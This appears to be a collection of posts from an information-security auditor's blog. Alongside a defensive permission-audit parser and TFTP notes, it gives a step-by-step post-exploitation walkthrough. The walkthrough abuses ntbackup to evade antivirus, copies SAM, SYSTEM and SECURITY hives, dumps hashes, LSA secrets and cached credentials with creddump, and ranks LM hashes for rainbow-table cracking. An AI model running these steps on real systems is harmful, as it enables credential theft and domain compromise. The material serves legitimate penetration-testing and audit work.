NTBACKUP: more than DR/BCP (Updated)

An auditor’s interest in the Windows NTBACKUP utility extends beyond examining an organization’s DR/BCP plan.

Suppose you just got command prompt access to a server (example tutorial 1, 2, & 3), but the host has anti-virus installed that you can’t disable. That rules out your trusty pwdump2 (the same utility SQLAT and SQLNINJA use) for dumping the local password hashes, because the AV flags it. No problem: use the built-in ntbackup utility to take a fresh System State backup, which includes the registry (the SAM, SYSTEM and SECURITY hives).

C:\>ntbackup backup systemstate /j "Auditor Owns Your Hashes" /f "%systemroot%\temp\%Username%SysState.bkf" /a
C:\>del "%systemroot%\temp\%Username%SysState.bkf"

The .bkf file itself is not needed, which is why it is deleted right away. What matters is the side effect: a System State backup refreshes the copies of the registry hives in %systemroot%\repair. Copy the sam, system, and security files from that folder.

Once you have those three hives, the command line utilities from the creddump project produce the same output you would get from PWDumpX (see tutorial).

creddump is written in Python, so Python (plus PyCrypto) needs to be installed for it to work.

Python version 2.5.4 from http://www.python.org/download/releases/2.5.4/
Pycrypto version 2.0.1 from http://jintoreedwine.com/files_and_stuff/pycrypto-2-0-1.zip

C:\creddump-0.1>pwdump.py SYSTEM SAM >> PWHashes.txt
C:\creddump-0.1>lsadump.py SYSTEM SECURITY >> LSASecrets.txt
C:\creddump-0.1>cachedump.py SYSTEM SECURITY >> PWCache.txt

Using RainbowCrack with the LM rainbow tables from The Shmoo Group you can recover the password of any local account in PWHashes.txt that still has an LM hash stored, i.e. any password of 14 characters or fewer on a host where LM hash storage has not been disabled (NoLMHash). Accounts whose LM field is the empty-password hash have to be attacked through the NT hash instead.
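Before loading the tables it helps to know which hashes are even candidates. The following is an added example, not code from the original post or from the creddump project: it reads pwdump-format output such as PWHashes.txt and sorts each account by what its LM hash tells you, using only the well-known hashes of the empty password. The sample lines are constructed and, apart from those two constants, the hash values are arbitrary hex rather than hashes of any real password.

```python
# Added example: triage of pwdump-format output (user:rid:lmhash:nthash:::),
# the format creddump's pwdump.py writes. Not code from the post or creddump.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of an empty password
EMPTY_LM_HALF = EMPTY_LM[:16]                   # each 7-char half is hashed on its own
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of an empty password

# Constructed sample PWHashes.txt. Apart from the empty-password constants,
# the hash values are arbitrary hex, not hashes of any real password.
SAMPLE_PWHASHES = """\
Administrator:500:1a2b3c4d5e6f708190a1b2c3d4e5f607:7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1005:aad3b435b51404eeaad3b435b51404ee:9c1b6f2d8e3a4b5c6d7e8f9a0b1c2d3e:::
jedge:1001:3f8b2c9a1d4e6f70aad3b435b51404ee:6e5d4c3b2a1f0e9d8c7b6a5f4e3d2c1b:::
"""


def classify(lm, nt):
    """Label an account by what its stored hashes let you attack."""
    if nt == EMPTY_NT and lm == EMPTY_LM:
        return "empty"      # blank password, nothing to crack
    if lm == EMPTY_LM:
        return "nt-only"    # LM storage disabled or password > 14 chars: LM tables are useless
    if lm[16:] == EMPTY_LM_HALF:
        return "lm-short"   # second half is empty, so the password is 1-7 characters
    return "lm-long"        # 8-14 characters, both halves need cracking


def triage(text):
    """Parse pwdump lines into {user: (rid, label, lm, nt)}."""
    result = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        fields = line.split(":")
        if len(fields) < 4:
            raise ValueError("not a pwdump line: %r" % line)
        user, rid = fields[0], int(fields[1])
        lm, nt = fields[2].lower(), fields[3].lower()
        result[user] = (rid, classify(lm, nt), lm, nt)
    return result


def lm_targets(text):
    """LM hashes worth running through the LM rainbow tables, in file order."""
    return [lm for (_, label, lm, _) in triage(text).values() if label.startswith("lm-")]


if __name__ == "__main__":
    for user, (rid, label, lm, _) in triage(SAMPLE_PWHASHES).items():
        print("%-14s rid=%-5d %-9s lm=%s" % (user, rid, label, lm))
```

The "lm-short" accounts are the cheap wins: only the first half of the LM hash carries any information, so they fall to a table lookup fastest. Writing the list from lm_targets one hash per line gives you a hash-list file to hand to RainbowCrack.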

See this tutorial on how to dictionary attack the cached domain credentials obtained in the PWCache.txt file.

Review the LSASecrets.txt file for the plaintext passwords of the accounts used to run Windows services. Often these are also domain accounts with the same password, or even Domain Administrator accounts.

Updated Configuration Tutorial

I have created an updated configuration document for my Motion Computing m1300 wireless tablet. This document details getting Ubuntu 8.04 LTS Hardy Heron up and running on the tablet. Included in the documentation are the steps to get Kismet, Aircrack-ng, and Karmasploit up and running. Those steps will be helpful no matter what hardware you install Ubuntu on.

I have also created an updated configuration document for the setup of my Linux laptop that I use for penetration testing.

Auditing Folder (and subfolder) Permissions using CACLS

Updated 7/2/2016 – yeah, I haven’t needed to parse the shitty output from this tool in 7 years. I never accounted for “special access” permissions not including the account with the access.
Updated 12/28/2018 – link to the code didn’t work so I’ve fixed that. Also updated if you receive a specific error message.

CACLS.exe is a great built-in Windows utility that lists the permissions on a file or folder. I have used it in an audit to get the permissions of the folders on an agency file server that served the “private” shares to each Domain user. The finding to look for when examining the results is any other Domain user (or a broad group such as Domain Users) with access to someone else’s “private” share.

For CACLS options and how to interpret the results see this site.
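As an added example (written here, not the script the post links to), this is how I would parse a saved cacls listing and flag the finding described above. The sample output, the AGENCY domain and the account names are constructed; the parser assumes the private folder names contain no spaces (they are named after the accounts), and it handles the quirk noted in the 2016 update: the rights under “(special access:)” are printed on their own lines without repeating the account.

```python
# Added example: parse captured cacls output and flag improper access to
# per-user "private" share folders. Not the post's own script.
import ntpath
import re

# Constructed sample, as `cacls C:\Private\* > acl.txt` might produce; the
# paths, accounts and the AGENCY domain are made up for the example.
CACLS_OUTPUT = r"""C:\Private\jsmith BUILTIN\Administrators:(OI)(CI)F
                  NT AUTHORITY\SYSTEM:(OI)(CI)F
                  AGENCY\jsmith:(OI)(CI)F
C:\Private\bjones BUILTIN\Administrators:(OI)(CI)F
                  NT AUTHORITY\SYSTEM:(OI)(CI)F
                  AGENCY\bjones:(OI)(CI)F
                  AGENCY\Domain Users:(OI)(CI)(special access:)
                                      READ_CONTROL
                                      SYNCHRONIZE
                                      FILE_GENERIC_READ
                                      FILE_READ_DATA
                  AGENCY\tadams:(OI)(CI)R
C:\Private\tadams BUILTIN\Administrators:(OI)(CI)F
                  NT AUTHORITY\SYSTEM:(OI)(CI)F
                  AGENCY\tadams:(OI)(CI)F
                  AGENCY\jsmith:(DENY)(OI)(CI)F
"""

# One ACE as cacls prints it: account, flags, then a permission letter or
# "(special access:)" with the individual rights on the following lines.
ACE_RE = re.compile(
    r"^(?P<account>[^:]+):"
    r"(?P<flags>(?:\((?:OI|CI|IO|NP|ID|DENY)\))*)"
    r"(?:(?P<special>\(special access:\))|(?P<perm>[FCRWN]))\s*$"
)

# Principals expected on every private folder (compared case-insensitively).
TRUSTED = {"builtin\\administrators", "nt authority\\system"}


def parse_cacls(text):
    """Return {folder: [ace, ...]}; each ace has account, flags, rights, deny."""
    acls = {}
    folder = None
    current = None          # the ACE that following special-access lines belong to
    for raw in text.splitlines():
        if not raw.strip():
            continue
        line = raw.strip()
        if not raw[0].isspace():
            # Header line: folder path followed by its first ACE. Assumes the
            # folder names carry no spaces (they are named after the accounts).
            folder, _, line = line.partition(" ")
            acls[folder] = []
            current = None
        m = ACE_RE.match(line)
        if m:
            flags = re.findall(r"\(([A-Z]+)\)", m.group("flags"))
            current = {
                "account": m.group("account").strip(),
                "flags": flags,
                "deny": "DENY" in flags,
                "rights": [m.group("perm")] if m.group("perm") else [],
            }
            acls[folder].append(current)
        elif ":" in line or current is None:
            raise ValueError("unrecognised cacls line: %r" % raw)
        else:
            # Rights of a "(special access:)" entry: cacls does not repeat the
            # account on these lines, so they attach to the most recent ACE.
            current["rights"].append(line)
    return acls


def improper_access(acls, domain, trusted=TRUSTED):
    """Allow ACEs on a private folder whose principal is neither the folder's
    owner (DOMAIN\\<folder name>) nor a trusted admin principal. Deny ACEs
    grant nothing, so they are skipped. Returns (folder, account, rights)."""
    findings = []
    for folder, aces in acls.items():
        owner = (domain + "\\" + ntpath.basename(folder)).lower()
        for ace in aces:
            who = ace["account"].lower()
            if ace["deny"] or who in trusted or who == owner:
                continue
            findings.append((folder, ace["account"], ",".join(ace["rights"])))
    return findings


if __name__ == "__main__":
    for folder, account, rights in improper_access(parse_cacls(CACLS_OUTPUT), "AGENCY"):
        print("%s: %s has %s" % (folder, account, rights))
```

On the sample, bjones’s folder produces two findings (Domain Users with read rights spelled out as special access, and tadams with R); the DENY entry on tadams’s folder is correctly ignored because it grants nothing.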

Penetration Testing Ninjitsu

Core Technologies hosted a series of three webcasts called Penetration Testing Ninjitsu by Ed Skoudis (http://www.coresecurity.com/content/webcast-series-with-sans). I highly recommend listening to these webcasts and downloading the slides for your reference. I’m including the commands extracted from the slides that can be very useful for a penetration test.

NOTE: 12/2018 – Link to the webcast no longer works. The Internet Archive has the slides as a PDF. I’ve downloaded it and host it here as well.

Setup TFTP

A TFTP server is an important tool for an Information Systems Auditor. It has come in handy in a couple of situations during an audit; the two that come to mind are retrieving Cisco configuration files and uploading Netcat during a SQL audit or SQL injection test. This is a quick post on how I like to set up my TFTP server on Linux and Windows.

My Linux distro of choice is Ubuntu.

$sudo -s
#apt-get install atftpd
#atftpd --daemon

That will get you started on Linux; atftpd serves files from /srv/tftp. For Windows I like the free TFTP server from www.solarwinds.com. Download and install it, then create the directory C:\TFTP-Root.
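To show what actually goes over the wire when a target pulls nc.exe from that directory (or you pull a router config), here is an added example of the TFTP read exchange from RFC 1350, with a tiny in-process server standing in for atftpd. It is not the post’s own code; the served “file” is constructed, and the server is simplified to answer from its listening socket rather than a fresh transfer port.

```python
# Added example: the TFTP read exchange (RFC 1350) that `tftp -i host GET`
# performs, with a tiny in-process server standing in for atftpd. Not the
# post's own code; the served "file" is constructed.
import socket
import struct
import threading

BLOCK = 512
OP_RRQ, OP_DATA, OP_ACK, OP_ERROR = 1, 3, 4, 5

# Constructed stand-in for nc.exe or a router config: 1280 bytes, so the
# transfer is two full blocks plus a short final block.
FILES = {"nc.exe": bytes(range(256)) * 5}


def serve_once(sock, files=FILES):
    """Answer one RRQ with DATA blocks, waiting for each ACK. Octet mode only,
    and (a simplification) replies from the listening socket instead of a
    fresh transfer port. Note the absence of any authentication: whoever can
    reach the port gets the file, which is exactly why TFTP is handy for
    pulling configs and pushing tools."""
    pkt, client = sock.recvfrom(1024)
    (opcode,) = struct.unpack("!H", pkt[:2])
    name = pkt[2:].split(b"\x00")[0].decode()
    if opcode != OP_RRQ or name not in files:
        sock.sendto(struct.pack("!HH", OP_ERROR, 1) + b"File not found\x00", client)
        return
    data = files[name]
    blocks = [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)] or [b""]
    if len(blocks[-1]) == BLOCK:
        blocks.append(b"")      # a transfer ends with a block shorter than 512 bytes
    for num, chunk in enumerate(blocks, 1):
        sock.sendto(struct.pack("!HH", OP_DATA, num) + chunk, client)
        ack, _ = sock.recvfrom(1024)
        if ack != struct.pack("!HH", OP_ACK, num):
            return              # no retransmit logic in this demo


def tftp_get(host, port, filename, timeout=2.0):
    """Client side: send RRQ, ACK each DATA block, stop at the short block."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(timeout)
    s.sendto(struct.pack("!H", OP_RRQ) + filename.encode() + b"\x00octet\x00", (host, port))
    out = bytearray()
    expected = 1
    try:
        while True:
            pkt, peer = s.recvfrom(4 + BLOCK)   # peer is the server's transfer port
            opcode, num = struct.unpack("!HH", pkt[:4])
            if opcode == OP_ERROR:
                raise IOError(pkt[4:].rstrip(b"\x00").decode())
            if opcode != OP_DATA or num != expected:
                continue                        # stray or duplicate packet
            out += pkt[4:]
            s.sendto(struct.pack("!HH", OP_ACK, num), peer)
            if len(pkt) - 4 < BLOCK:
                return bytes(out)
            expected += 1
    finally:
        s.close()


def demo(filename="nc.exe"):
    """Run server and client against each other on a loopback port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    srv.bind(("127.0.0.1", 0))                  # any free port; real servers use udp/69
    srv.settimeout(5)
    port = srv.getsockname()[1]
    t = threading.Thread(target=serve_once, args=(srv,), daemon=True)
    t.start()
    try:
        return tftp_get("127.0.0.1", port, filename)
    finally:
        t.join(5)
        srv.close()


def demo_error(filename="missing.cfg"):
    """Request a file the server does not have; returns the TFTP error text."""
    try:
        demo(filename)
    except IOError as e:
        return str(e)
    return None


if __name__ == "__main__":
    print("got %d bytes" % len(demo()))
    print("error case:", demo_error())
```

The whole protocol is four packet types and a block counter, which is why the Windows tftp.exe client and the IOS copy command can both talk to any server you stand up. The same lack of authentication cuts both ways: keep the server running only while you need it and serve only the files you intend to hand out.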

Hello Auditors!

Welcome to jedge.com. I’m James Edge, the host of this site. My goal for this site is to create a collaborative portal for documents, links, and thoughts regarding auditing Information System security at a state government level. I’ve been working in state government for a few years with both New York and Georgia state and I hope to express my thoughts and opinions related to auditing with what I’ve experienced working for those governments. Enjoy the site and feel free to post a comment for whatever reason. I hope the feedback I receive will further improve the site. Thanks.